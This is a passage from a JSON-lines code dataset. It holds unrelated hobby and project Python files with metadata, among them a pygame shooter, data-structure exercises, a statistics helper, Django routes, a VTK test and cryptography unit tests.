include(router.urls)),\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"467319553","text":"import pandas as pd\r\ndata=pd.read_csv(\"data.csv\")\r\n\r\n#####Splitting Dataset Into Train and Test##############\r\nfrom sklearn.cross_validation import StratifiedShuffleSplit\r\nsss = StratifiedShuffleSplit(data['Gender'], 3, test_size=0.5, random_state=0)\r\nfor train_index, test_index in sss:\r\n print(\"TRAIN:\", train_index, \"TEST:\", test_index)\r\n X_train, X_test = data[train_index], data[test_index]\r\n y_train, y_test = data[train_index], data[test_index]\r\n\r\n######Converting Categorical To Numerical##############\r\n#from sklearn.preprocessing import LabelEncoder\r\n#le = LabelEncoder()\r\n#var_mod = ['LastLetter','LastTwoLetter','FirstLetter']\r\n#for i in var_mod:\r\n# train[i] = le.fit_transform(train[i])\r\n# test[i] = le.fit_transform(test[i])\r\n#\r\n##Following Gaussian Distribution\r\n#train.loc['LastLetter']['Gender'==1].plot.density()\r\n#train['LastTwoLetter'].plot.density() \r\n#train['FirstLetter'].plot.density()\r\n#\r\n#\r\n#import numpy as np\r\n#from sklearn.naive_bayes import GaussianNB\r\n#model = GaussianNB()\r\n#\r\n######Training Part##############\r\n#numpyMatrix_train = train.as_matrix()\r\n#x=np.array(numpyMatrix_train[:,[2,3,4]]).astype('int')\r\n#y=np.array(numpyMatrix_train[:,1]).astype('int')\r\n#model.fit(x,y)\r\n#\r\n######Testing Part##############\r\n#numpyMatrix_test = test.as_matrix()\r\n#X_test=np.array(numpyMatrix_test[:,[2,3,4]]).astype('int')\r\n#Y_actual=np.array(numpyMatrix_test[:,1]).astype('int')\r\n#Y_test= model.predict(X_test)\r\n#\r\n######Confusion Matrix##############\r\n#from sklearn.metrics import confusion_matrix\r\n#cnf_matrix = confusion_matrix(Y_actual, Y_test)\r\n#print(cnf_matrix)\r\n#\r\n#from sklearn import tree\r\n#clf = tree.DecisionTreeClassifier()\r\n#clf = clf.fit(x, y)\r\n#Y_test_decisiontree=clf.predict(X_test)\r\n#cnf_matrix_decisontree = confusion_matrix(Y_actual, Y_test_decisiontree)\r\n#print(cnf_matrix_decisontree)\r\n","sub_path":"NaiveBayesianPython.py","file_name":"NaiveBayesianPython.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"268994660","text":"from Myemail import Myemail\nfrom Nifty50 import Nifty50\nfrom keyvaluedao import KeyvalueDAO\nimport sqlite3\n\nprint(\"Invoked the advanced decline\")\nnifty50 = Nifty50()\nkeyvaluedao = KeyvalueDAO()\nconn = sqlite3.connect(\"stock.db\")\nflag = keyvaluedao.getValue(conn, \"advance_notify\")\n\nif flag == \"true\":\n output = nifty50.getnifty50()\n advance = output[\"advances\"]\n decline = output[\"declines\"]\n\n subject = \"Advance: \" + str(advance) + \" Decline: \" + str(decline)\n\n counter = 0\n message = \"\"\n while counter < 50:\n message = message + output[\"data\"][counter][\"symbol\"] + \" \" + output[\"data\"][counter][\"per\"] + \"\\n\"\n counter = counter + 1\n #print(message)\n\n myemail = Myemail()\n myemail.send_email(\"aruna\", \"aruna\", \"report\", subject, message)\n\n\n\n","sub_path":"hourlyadde.py","file_name":"hourlyadde.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"240970077","text":"import pytest\n\nfrom sdc.crypto.decrypter import decrypt\nfrom sdc.crypto.key_store import KeyStore\nfrom sdc.crypto.exceptions import InvalidTokenException\nfrom tests import TEST_DO_NOT_USE_UPSTREAM_PUBLIC_PEM, TEST_DO_NOT_USE_SR_PRIVATE_PEM\nfrom tests import TOO_FEW_TOKENS_JWE, VALID_JWE\n\n\nKEY_PURPOSE_AUTHENTICATION = \"authentication\"\n\n# jwt.io public key signed\nTEST_DO_NOT_USE_PUBLIC_KEY = \"\"\"-----BEGIN PUBLIC KEY-----\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDdlatRjRjogo3Wojg\nGHFHYLugdUWAY9iR3fy4arWNA1KoS8kVw33cJibXr8bvwUAUparCwlv\ndbH6dvEOfou0/gCFQsHUfQrSDv+MuSUMAe8jzKE4qW+jK+xQU9a03GU\nnKHkkle+Q0pX/g6jXZ7r1/xAK5Do2kQ+X5xK9cipRgEKwIDAQAB\n-----END PUBLIC KEY-----\"\"\"\n\n\nclass TestDecrypter:\n\n key_store = KeyStore({\n \"keys\": {\n \"e19091072f920cbf3ca9f436ceba309e7d814a62\": {'purpose': KEY_PURPOSE_AUTHENTICATION,\n 'type': 'private',\n 'value': TEST_DO_NOT_USE_SR_PRIVATE_PEM},\n \"EQ_USER_AUTHENTICATION_SR_PRIVATE_KEY\": {'purpose': KEY_PURPOSE_AUTHENTICATION,\n 'type': 'private',\n 'value': TEST_DO_NOT_USE_SR_PRIVATE_PEM},\n \"EDCRRM\": {'purpose': KEY_PURPOSE_AUTHENTICATION,\n 'type': 'public',\n 'value': TEST_DO_NOT_USE_PUBLIC_KEY},\n \"709eb42cfee5570058ce0711f730bfbb7d4c8ade\": {'purpose': KEY_PURPOSE_AUTHENTICATION,\n 'type': 'public',\n 'value': TEST_DO_NOT_USE_UPSTREAM_PUBLIC_PEM},\n }\n })\n\n def test_decrypt(self):\n json = decrypt(VALID_JWE, self.key_store, KEY_PURPOSE_AUTHENTICATION)\n assert json == {'user': 'jimmy', 'iat': 1498137519.135479, 'exp': 1.0000000000014982e+21}\n\n def test_decrypt_too_few_tokens_in_jwe(self):\n \"\"\"Tests an InvalidTokenException when the token isn't comprised of 5 parts, seperated by several '.' characters\"\"\"\n with pytest.raises(InvalidTokenException):\n decrypt(TOO_FEW_TOKENS_JWE, self.key_store, KEY_PURPOSE_AUTHENTICATION)\n","sub_path":"tests/test_decrypter.py","file_name":"test_decrypter.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"236797007","text":"import cv2\n\ncapt = cv2.VideoCapture(0)\n\nclassifer = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n\nwhile True:\n\n ret, img = capt.read()\n\n if ret:\n faces = classifer.detectMultiScale(img)\n \n for face in faces:\n x, y, w, h = face\n img = cv2.rectangle(img, (x,y), (x+w, y+h), (255, 0, 0), 4)\n \n cv2.imshow(\"face detection program\", img)\n\n key = cv2.waitKey(1)\n\n if key == ord(\"q\"):\n break;\n\ncapt.release()\ncv2.destroyAllWindows()","sub_path":"Desktop/Santushti/python_work/ml_face_detect.py","file_name":"ml_face_detect.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"479108559","text":"\"\"\"\n-------------------------------------------------------------------------------\nName: ShooterGame.py\nPurpose:\nA simple, fun 2d shooter game based on python and pygame\nAuthor: P. Andy\nCreated on: 06/16/2016\n------------------------------------------------------------------------------\n\"\"\"\n\n# Import necessary library\nimport pygame\nfrom pygame.locals import *\nimport random\nimport math\n\n### Initialize the game\n\n# Screen\npygame.init()\nwidth, height = 1200, 600\nscreen=pygame.display.set_mode((width, height))\n\n# Player movement\nkeys = [False, False, False, False]\nplayer_position = [600,300]\n\n# Bullet\naccuracy = [0,0]\nbullets = []\n\n# Enemy related\nenemy_timer = 100\nenemy_timer2 = 0\nenemies = [[1200,100]]\nhealth_value = 194\n\n### Load images\n\n# The character that the player will control\nplayer = pygame.image.load(\"image/hero.png\").convert_alpha()\nplayer = pygame.transform.scale(player, (100, 100))\n\n# The wooden tiles on the bakcground\nbackground = pygame.image.load(\"image/background.png\")\nbackground = pygame.transform.scale(background, (100, 100))\n\n# The girls that the player must protect\nobjective = pygame.image.load(\"image/girl.png\")\nobjective = pygame.transform.scale(objective, (90, 90))\n\n# The bullet that the character will shoot\nbullet = pygame.image.load(\"image/bullet.png\")\n\n# Enemies that need to be defeated\nslime = pygame.image.load(\"image/slime.png\")\nslime = pygame.transform.scale(slime, (50,50))\nslime1 = slime\n\n# For the health meter\nhealth_bar = pygame.image.load(\"image/healthbar.png\")\nhealth = pygame.image.load(\"image/health.png\")\n\n# Ending\nlose_message = pygame.image.load(\"image/lose_message.png\")\nlose_message = pygame.transform.scale(lose_message, (1200,600))\nwin_message = pygame.image.load(\"image/win_message.png\")\nwin_message = pygame.transform.scale(win_message, (1200,600))\n\n# All the audio\n\n# 3.1 - Load audio\nobjective_damage = pygame.mixer.Sound(\"audio/objective_damage.wav\")\nenemy_death = pygame.mixer.Sound(\"audio/enemy_death.wav\")\nbullet_fire = pygame.mixer.Sound(\"audio/bullet.wav\")\nobjective_damage.set_volume(0.05)\nenemy_death.set_volume(0.05)\nbullet_fire.set_volume(0.05)\npygame.mixer.music.load('audio/bgm.mp3')\npygame.mixer.music.play(-1, 0.0)\npygame.mixer.music.set_volume(0.35)\n\n# Conditions for lose and win\nrunning = 1\nexitcode = 0\n\n### Loop until game is completed\nwhile running:\n\n # To spawn enemies at constant pattern\n enemy_timer -= 1\n\n # Clear the screen\n screen.fill(0)\n\n # Draw the background and objective\n for x in range(width/background.get_width()+1):\n for y in range(height/background.get_height()+1):\n screen.blit(background,(x*100,y*100))\n\n # Draw the objective (girls)\n screen.blit(objective, (0,10))\n screen.blit(objective, (0,110))\n screen.blit(objective, (0,210))\n screen.blit(objective, (0,310))\n screen.blit(objective, (0,410))\n screen.blit(objective, (0,510))\n\n # Complicated math formula involving trigonometry\n # For rotation of the player based on the mouse cursor\n mouse_position = pygame.mouse.get_pos()\n angle = math.atan2(mouse_position[1] - (player_position[1] + 32), mouse_position[0] - (player_position[0] + 26))\n player_rotation = pygame.transform.rotate(player, 360 - angle * 57.29)\n player_position2 = (player_position[0] - player_rotation.get_rect().width / 2,\n player_position[1] - player_rotation.get_rect().height / 2)\n screen.blit(player_rotation, player_position2)\n\n # Code for player firing bullet\n for i in bullets:\n\n # Initialize and set up basic info\n index = 0\n velx = math.cos(i[0]) * 10\n vely = math.sin(i[0]) * 10\n i[1] += velx\n i[2] += vely\n\n # If out of boundary, delete it.\n if i[1] < -64 or i[1] > 1200 or i[2] <- 64 or i[2] > 600:\n bullets.pop(index)\n\n index+=1\n\n # Calculate bullet's rotation and draw it on the screen\n for projectile in bullets:\n bullet2 = pygame.transform.rotate(bullet, 360 - projectile[0] * 57.29)\n screen.blit(bullet2, (projectile[1], projectile[2]))\n\n # Draw the enemy slime\n\n if enemy_timer == 0:\n enemies.append([1200, random.randint(50, 550)])\n enemy_timer = 100 - (enemy_timer2 * 2)\n\n if enemy_timer2 >= 35:\n enemy_timer2 = 35\n\n else:\n enemy_timer2 += 5\n\n index = 0\n\n for enemy in enemies:\n\n if enemy[0] < -64:\n enemies.pop(index)\n enemy[0] -= 5\n\n # Allow the enemies to attack the objective\n enemy_rect = pygame.Rect(slime1.get_rect())\n enemy_rect.top = enemy[1]\n enemy_rect.left = enemy[0]\n\n if enemy_rect.left < 64:\n objective_damage.play()\n health_value -= random.randint(5, 20)\n enemies.pop(index)\n\n # Check if bullet collides with slime\n index1 = 0\n\n for i in bullets:\n\n # Set up rectangles to check collision\n bullet_rect = pygame.Rect(bullet.get_rect())\n bullet_rect.left = i[1]\n bullet_rect.top = i[2]\n\n # If it does, eliminate both the bullet and the enemy\n if enemy_rect.colliderect(bullet_rect):\n enemy_death.play()\n accuracy[0] += 1\n enemies.pop(index)\n bullets.pop(index1)\n\n index1 += 1\n\n # Next slime\n index += 1\n\n for enemy in enemies:\n screen.blit(slime1, enemy)\n\n # Draw the time display which indicates how long the game will last\n font = pygame.font.Font(None, 46)\n survivedtext = font.render(str((30000 - pygame.time.get_ticks()) / 60000)+ \":\" + str((30000 - pygame.time.get_ticks()) / 1000 % 60).zfill(2), True, (0,0,0))\n textRect = survivedtext.get_rect()\n textRect.topright = [1195, 5]\n screen.blit(survivedtext, textRect)\n\n # Draw the health meter, displaying amount of health left\n screen.blit(health_bar, (100,10))\n for health1 in range(health_value):\n screen.blit(health, (health1+103,13))\n\n # Update the screen\n pygame.display.flip()\n\n # Main loop for the event codes\n for event in pygame.event.get():\n\n # Allow the player to end the game at their convenience\n if event.type==pygame.QUIT:\n pygame.quit()\n exit(0)\n\n # Change the status to true when the keys are pressed\n elif event.type == pygame.KEYDOWN:\n if event.key == K_w:\n keys[0] = True\n elif event.key == K_a:\n keys[1] = True\n elif event.key == K_s:\n keys[2] = True\n elif event.key == K_d:\n keys[3] = True\n\n # Revert when the keys are lifted\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_w:\n keys[0] = False\n elif event.key == pygame.K_a:\n keys[1] = False\n elif event.key==pygame.K_s:\n keys[2] = False\n elif event.key == pygame.K_d:\n keys[3] = False\n\n # Complicated math formula for bullet and its rotation\n elif event.type == pygame.MOUSEBUTTONDOWN:\n bullet_fire.play()\n position = pygame.mouse.get_pos()\n accuracy[1] += 1\n bullets.append([math.atan2(position[1] - (player_position2[1] + 32), position[0]\n - (player_position2[0] + 26)),player_position2[0] + 32, player_position2[1] + 32])\n\n # While status is true, move the player (direction depends on which key)\n if keys[0]:\n player_position[1] -= 5\n elif keys[2]:\n player_position[1] += 5\n elif keys[1]:\n player_position[0] -= 5\n elif keys[3]:\n player_position[0] += 5\n\n # Check whether player loses or wins\n\n # Win condition\n if pygame.time.get_ticks() >= 30000:\n running=0\n exitcode=1\n\n # Lose condition\n elif health_value <= 0:\n running=0\n exitcode=0\n\n # Calculate accuracy percentage (given that player landed at least one shot)\n elif accuracy[1] != 0:\n accuracy1 = accuracy[0] * 1.0 / accuracy[1]*100\n\n else:\n accuracy1 = 0\n\n# Display ending based one whether player wins or loses\n\n# Player loses\nif exitcode == 0:\n pygame.font.init()\n font = pygame.font.Font(None, 46)\n text = font.render(\"Accuracy: \"+str(accuracy1)+\"%\", True, (255,0,0))\n textRect = text.get_rect()\n textRect.centerx = screen.get_rect().centerx\n textRect.centery = screen.get_rect().centery+24\n screen.blit(lose_message, (0,0))\n screen.blit(text, textRect)\n\n# Player wins\nelse:\n pygame.font.init()\n font = pygame.font.Font(None, 46)\n text = font.render(\"Accuracy: \"+str(accuracy1)+\"%\", True, (0,255,0))\n textRect = text.get_rect()\n textRect.centerx = screen.get_rect().centerx\n textRect.centery = screen.get_rect().centery+24\n screen.blit(win_message, (0,0))\n screen.blit(text, textRect)\n\nwhile 1:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n exit(0)\n pygame.display.flip()","sub_path":"ShooterGame.py","file_name":"ShooterGame.py","file_ext":"py","file_size_in_byte":9156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"160649123","text":"class Node(object):\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\n\nclass BST(object):\n def __init__(self, root):\n self.root = Node(root)\n\n def insert(self, new_val):\n self.insert_helper(self.root, new_val)\n\n def insert_helper(self, current, new_val):\n if new_val < current.value:\n if current.left:\n self.insert_helper(current.left, new_val)\n else:\n current.left = Node(new_val)\n elif new_val > current.value:\n if current.right:\n self.insert_helper(current.right, new_val)\n else:\n current.right = Node(new_val)\n else:\n print(f\"{new_val} is already in the tree\")\n\n def search(self, find_val):\n return self.search_helper(self.root, find_val)\n\n def search_helper(self, current, find_val):\n if current:\n if current.value == find_val:\n return True\n elif current.value > find_val:\n return self.search_helper(current.left, find_val)\n else:\n return self.search_helper(current.right, find_val)\n\n def inorder_list(self, current, L):\n if current:\n L = self.inorder_list(current.left, L)\n L.append(current.value)\n L = self.inorder_list(current.right, L)\n return L\n\n def is_BST(self):\n L = self.inorder_list(self.root, [])\n while len(L) >1 and L[-1] > L[-2]:\n L.pop()\n return len(L) <2\n \nbst = BST(8)\nbst.insert(3)\nbst.insert(10)\nbst.insert(1)\nbst.insert(6)\nbst.insert(9)\nbst.insert(11)\n\nprint(bst.is_BST())","sub_path":"Binary Trees/binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"157633599","text":"#--------------------------------------------------------------------------------\n# Just a mini script to review statistical functions & implementing them on Python\n# \n# Currently supported functions:\n# - mean\n# - median\n# - variance\n# - standard deviation\n# - range\n# - 1st Quartile / 25th Percentile / 0.25 Quantile\n# - 3rd Quartile / 75th Percentile / 0.75 Quantile\n# - IQR\n#--------------------------------------------------------------------------------\nimport math\n\n# Function already exists in Python\n# sum()\n# max()\n# min()\n# len()\n# sorted()\n\n# returns the average value of all elements in arr\ndef mean( arr ):\n\treturn sum(arr) / len(arr)\n\n# if array length == EVEN, return avg of the 2 middle values\n# if array length == ODD, return middle value\ndef median( arr ):\n\tarr = sorted(arr)\n\tlength = len(arr)\n\n\tif not(length > 0):\n\t\tprint( \"Array must at least have a length > 0\")\n\t\treturn\n\n\t# if number is even\n\tif( length % 2 == 0):\n\t\t# return avg of the 2 middle values\n\t\treturn ( arr[ int(length/2) ] + arr[ int((length/2)-1) ] ) / 2\n\t# else number is odd\n\telse:\n\t\t# returns the middle value\n\t\treturn arr[ int(length/2) ]\n\n# return variance of all elements in arr\ndef variance( arr ):\n\tmeanVal = mean(arr)\t\t\t# get mean values of array\n\tvar_sum = 0\t\t\t\t\t# sum of (difference to the mean, squared)\n\n\t# Calculating summation term in variance formula\n\tfor i in range( len(arr) ):\n\t\ttemp = arr[i] - meanVal\t\t\t\n\t\tvar_sum += math.pow( temp, 2 )\n\n\treturn var_sum / ( len( arr ) - 1 )\t# return variance = var_sum / (N-1)\n\n# return standard deviation of all elements in arr\ndef sd( arr ):\n\treturn math.sqrt( variance( arr ) )\n\n# return the (min,max) of arr\ndef Range( arr ):\n\treturn max(arr)-min(arr)\n\n#-------------------------------------------------------\n# No standard method to calc. quar_1(), quar_3() & iqr()\n# so I'll be using the method taught in class\n#-------------------------------------------------------\n# return the 1st quartile / 25th percentile / 0.25 quantile of the arr\n# i.e. returns the median of the lower half array\ndef quar_1(arr):\n\tarr = sorted(arr)\n\tlength = len(arr)\n\n\tif not(length > 0):\n\t\tprint( \"Array must at least have a length > 0\")\n\t\treturn\n\n\t# if number is even\n\tif( length % 2 == 0):\n\t\t# divide arr into 2 and return median of lower half\n\t\treturn median( arr[:int(length/2)] )\n\t# else number is odd\n\telse:\n\t\t# ignore the median, then divide arr into 2 and return median of lower half\n\t\treturn median( arr[:int((length-1)/2)] )\n\n# return the 3rd quartile / 75th percentile / 0.75 quantile of the arr\n# i.e. returns the median of the upper half array\ndef quar_3(arr):\n\tarr = sorted(arr)\n\tlength = len(arr)\n\n\tif not(length > 0):\n\t\tprint( \"Array must at least have a length > 0\")\n\t\treturn\n\n\t# if number is even\n\tif( length % 2 == 0):\n\t\t# divide arr into 2 and return median of upper half\n\t\treturn median( arr[int(length/2):] )\n\t# else number is odd\n\telse:\n\t\t# ignore the median, then divide arr into 2 and return median of upper half\n\t\treturn median( arr[int((length+1)/2):] )\n\n# return the IQR value of arr\ndef iqr( arr ):\n\treturn quar_3(arr) - quar_1(arr)\n\n#----------------------------------------------------------------------------------\ntestarr = [5,9,14,4,6,3,1]\n\nprint( \"INPUT ---> \\t\", testarr )\nprint( \"SORTED --> \\t\", sorted(testarr) )\nprint( \"COUNT(#) = \\t\", len(testarr) )\nprint( \"MAX = \\t\", max(testarr) ) \nprint( \"MIN = \\t\", min(testarr) ) \nprint( \"RANGE = \\t\", Range(testarr) )\nprint()\nprint( \"MEAN = \\t\", mean( testarr ) )\nprint( \"1st QUAR = \\t\", quar_1(testarr) ) \nprint( \"MEDIAN = \\t\", median( testarr ) )\nprint( \"3rd QUAR = \\t\", quar_3(testarr) ) \nprint( \"IQR = \\t\", iqr(testarr) ) \nprint( \"VARIANCE = \\t\", variance(testarr) )\nprint( \"SD = \\t\", sd(testarr) ) \n","sub_path":"STAT251/statsCalculator.py","file_name":"statsCalculator.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"443976316","text":"from app01 import models\nfrom concurrent.futures import ThreadPoolExecutor\nfrom django.shortcuts import render,HttpResponse\nfrom app01.utils.network_device import Epon\nfrom app01.utils.NDMS_settings import INT3\n\ndef epon_create_update(req):\n # objs_epon = models.Device.objects.filter(tag__name=\"EPON\")\n objs_epon = models.Device.objects.filter(tag__name=\"EPON\",tag__version__name='Version 5.20')\n print(\"开始进行EPON设备信息更新\")\n pool = ThreadPoolExecutor(INT3)\n for obj_epon in objs_epon:\n if obj_epon.tag.name == \"EPON\":\n # print(obj,obj.name,obj.IP)\n obj = Epon(obj_epon.IP)\n pool.submit(Epon.epon_check_update, obj)\n # 将子线程对象添加到列表中\n else:\n print(\"wrong\")\n pool.shutdown(wait=False)\n\n return HttpResponse(\"EPON设备信息更新正在运行中\")\n\n","sub_path":"about_NDMS/NDMS/app01/myviews/epon_info_update.py","file_name":"epon_info_update.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"50642268","text":"from django.conf.urls import url\n\nfrom .views import (\n DashboardView,\n\n ProjectCreateView,\n ProjectDeleteView,\n ProjectUpdateView,\n ProjectView,\n\n TaskCreateView,\n TaskDeleteView,\n TaskDetailView,\n TaskDoneView,\n TaskUpdateView,\n TaskAssignTeamMemberUpdateView,\n\n TeamMemberCreateView,\n TeamMemberDetailView,\n TeamMemberUpdateView,\n TeamMemberDeleteView,\n)\n\nurlpatterns = (\n url(r'^$', DashboardView.as_view(), name='dashboard'),\n url(r'^project/create/$', ProjectCreateView.as_view(),\n name='project_create'),\n url(r'^project/(?P[0-9]+)$', ProjectView.as_view(), name='project'),\n url(r'^project/(?P[0-9]+)/update$',\n ProjectUpdateView.as_view(), name='project_update'),\n url(r'^project/(?P[0-9]+)/delete$',\n ProjectDeleteView.as_view(), name='project_delete'),\n\n url(r'^project/(?P[0-9]+)/task_create',\n TaskCreateView.as_view(), name='task_create'),\n url(r'^task/(?P[0-9]+)$',\n TaskDetailView.as_view(), name='task'),\n url(r'^task/(?P[0-9]+)/update$',\n TaskUpdateView.as_view(), name='task_update'),\n url(r'^task/(?P[0-9]+)/update_team_members$',\n TaskAssignTeamMemberUpdateView.as_view(),\n name='task_update_team_members'),\n url(r'^task/(?P[0-9]+)/delete$',\n TaskDeleteView.as_view(), name='task_delete'),\n url(r'^task/(?P[0-9]+)/done$',\n TaskDoneView.as_view(), name='task_done'),\n\n url(r'^teammember/create$',\n TeamMemberCreateView.as_view(), name='team_member_create'),\n url(r'^teammember/(?P[0-9]+)$',\n TeamMemberDetailView.as_view(), name='team_member'),\n url(r'^teammember/(?P[0-9]+)/update$',\n TeamMemberUpdateView.as_view(), name='team_member_update'),\n url(r'^teammember/(?P[0-9]+)/delete$',\n TeamMemberDeleteView.as_view(), name='team_member_delete'),\n\n)\n","sub_path":"remindmyteam.com/dashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"356450341","text":"#!/usr/bin/env python\n\nclass FenwickTree():\n \"\"\"\n Data structure for providing O(lg(n)) single element alteration\n and range sum query. All indices are zero based.\n \"\"\"\n def __init__(self, num_elements):\n self.num_elements = 4 * num_elements + 1\n self.array = [0] * self.num_elements\n\n @staticmethod\n def _get_fenwick_step_length(num):\n return num&-num\n\n def alter(self, index, amount):\n \"\"\"\n Alter the element at index and add amount to it\n \"\"\"\n while index < self.num_elements:\n self.array[index] += amount\n index += self._get_fenwick_step_length(index)\n\n def query(self, from_index, to_index):\n \"\"\"\n Sum of the elements between from_index and to_index, both inclusive\n \"\"\"\n return self._query(to_index) - self._query(from_index - 1)\n\n def _query(self, index):\n result = 0\n while index > 0:\n result += self.array[index]\n index -= self._get_fenwick_step_length(index)\n return result\n\n\nif __name__ == \"__main__\":\n fw = FenwickTree(10)\n fw.alter(1, 1)\n fw.alter(2, 2)\n fw.alter(3, 3)\n fw.alter(4, 4)\n \n for i in range(1, 4 + 1):\n for j in range(i, 4 + 1):\n expected = 0\n for k in range(i, j + 1):\n expected += k\n assert expected == fw.query(i, j)\n","sub_path":"Data Structures/Fenwick Tree/Python/FenwickTree.py","file_name":"FenwickTree.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"27870412","text":"#!/usr/bin/env python\nfrom vtkmodules.vtkCommonCore import vtkMath\nfrom vtkmodules.vtkCommonDataModel import vtkSphere\nfrom vtkmodules.vtkCommonSystem import vtkTimerLog\nfrom vtkmodules.vtkFiltersCore import (\n vtkHedgeHog,\n vtkMaskPoints,\n)\nfrom vtkmodules.vtkFiltersModeling import vtkOutlineFilter\nfrom vtkmodules.vtkFiltersPoints import (\n vtkBoundedPointSource,\n vtkFitImplicitFunction,\n vtkPCANormalEstimation,\n)\nfrom vtkmodules.vtkRenderingCore import (\n vtkActor,\n vtkPointGaussianMapper,\n vtkPolyDataMapper,\n vtkRenderWindow,\n vtkRenderWindowInteractor,\n vtkRenderer,\n)\nimport vtkmodules.vtkInteractionStyle\nimport vtkmodules.vtkRenderingFreeType\nimport vtkmodules.vtkRenderingOpenGL2\nfrom vtkmodules.util.misc import vtkGetDataRoot\nVTK_DATA_ROOT = vtkGetDataRoot()\n\n# Interpolate onto a volume\n\n# Parameters for debugging\nNPts = 1000000\nmath = vtkMath()\nmath.RandomSeed(31415)\n\n# create pipeline\n#\npoints = vtkBoundedPointSource()\npoints.SetNumberOfPoints(NPts)\npoints.ProduceRandomScalarsOn()\npoints.ProduceCellOutputOff()\npoints.Update()\n\n# Create a sphere implicit function\nsphere = vtkSphere()\nsphere.SetCenter(0,0,0)\nsphere.SetRadius(0.75)\n\n# Extract points along sphere surface\nextract = vtkFitImplicitFunction()\nextract.SetInputConnection(points.GetOutputPort())\nextract.SetImplicitFunction(sphere)\nextract.SetThreshold(0.005)\nextract.Update()\n\n# Now generate normals from resulting points\nnorms = vtkPCANormalEstimation()\nnorms.SetInputConnection(extract.GetOutputPort())\nnorms.SetSampleSize(20)\nnorms.FlipNormalsOn()\nnorms.SetNormalOrientationToGraphTraversal()\n\n# Time execution\ntimer = vtkTimerLog()\ntimer.StartTimer()\nnorms.Update()\ntimer.StopTimer()\ntime = timer.GetElapsedTime()\nprint(\"Points processed: {0}\".format(NPts))\nprint(\" Time to generate normals: {0}\".format(time))\n#print(hBin)\n#print(hBin.GetOutput())\n\nsubMapper = vtkPointGaussianMapper()\nsubMapper.SetInputConnection(norms.GetOutputPort())\nsubMapper.EmissiveOff()\nsubMapper.SetScaleFactor(0.0)\n\nsubActor = vtkActor()\nsubActor.SetMapper(subMapper)\n\n# Draw the normals\nmask = vtkMaskPoints()\nmask.SetInputConnection(norms.GetOutputPort())\nmask.SetRandomModeType(1)\nmask.SetMaximumNumberOfPoints(250)\n\nhhog = vtkHedgeHog()\nhhog.SetInputConnection(mask.GetOutputPort())\nhhog.SetVectorModeToUseNormal()\nhhog.SetScaleFactor(0.25)\n\nhogMapper = vtkPolyDataMapper()\nhogMapper.SetInputConnection(hhog.GetOutputPort())\n\nhogActor = vtkActor()\nhogActor.SetMapper(hogMapper)\n\n# Create an outline\noutline = vtkOutlineFilter()\noutline.SetInputConnection(points.GetOutputPort())\n\noutlineMapper = vtkPolyDataMapper()\noutlineMapper.SetInputConnection(outline.GetOutputPort())\n\noutlineActor = vtkActor()\noutlineActor.SetMapper(outlineMapper)\n\n# Create the RenderWindow, Renderer and both Actors\n#\nren0 = vtkRenderer()\nrenWin = vtkRenderWindow()\nrenWin.AddRenderer(ren0)\niren = vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\n\n# Add the actors to the renderer, set the background and size\n#\nren0.AddActor(subActor)\nren0.AddActor(hogActor)\nren0.AddActor(outlineActor)\nren0.SetBackground(0.1, 0.2, 0.4)\n\nrenWin.SetSize(250,250)\n\ncam = ren0.GetActiveCamera()\ncam.SetFocalPoint(1,1,1)\ncam.SetPosition(0,0,0)\nren0.ResetCamera()\n\niren.Initialize()\n\n# render the image\n#\nrenWin.Render()\n\niren.Start()\n","sub_path":"Filters/Points/Testing/Python/TestPCANormalEstimation2.py","file_name":"TestPCANormalEstimation2.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"47431900","text":"from random import seed\r\nfrom random import random\r\nimport numpy\r\nimport time\r\n\r\ncolors = ['Red', 'Blue', 'Green', 'Yellow', 'Black']\r\n\r\nstates = ['1', '2', '3', '4']\r\n\r\nneighbors = {}\r\nneighbors['1'] = ['2', '3']\r\nneighbors['2'] = ['1', '3', '4']\r\nneighbors['3'] = ['1', '2', '4']\r\nneighbors['4'] = ['2','3']\r\n\r\ncolors_of_states = {}\r\n\r\n#color_and_fitness=numpy.empty((range(states),2))\r\n\r\nfitness_and_state = {}\r\nfitness = {}\r\n\r\n #code sampled from a java implementation of ABC\r\n #control parameters of ABC algorithm\r\nnp = 20 #len(states) # 20 # the number of the colony size (employed bees + onlooker bees\r\n # might need to have this to be changed based on the nodes that\r\n # are given into the problem\r\nfoodNumber = np/2 # the number of food sources, it equals half of\r\n # the colony size\r\nlimit = 100 # if a food source can't be improved by this limit we abandon\r\nmaxCycle = 2500 # the number of cycles the bee can make\r\n\r\n#problem specific variables\r\nD = 100 # the number 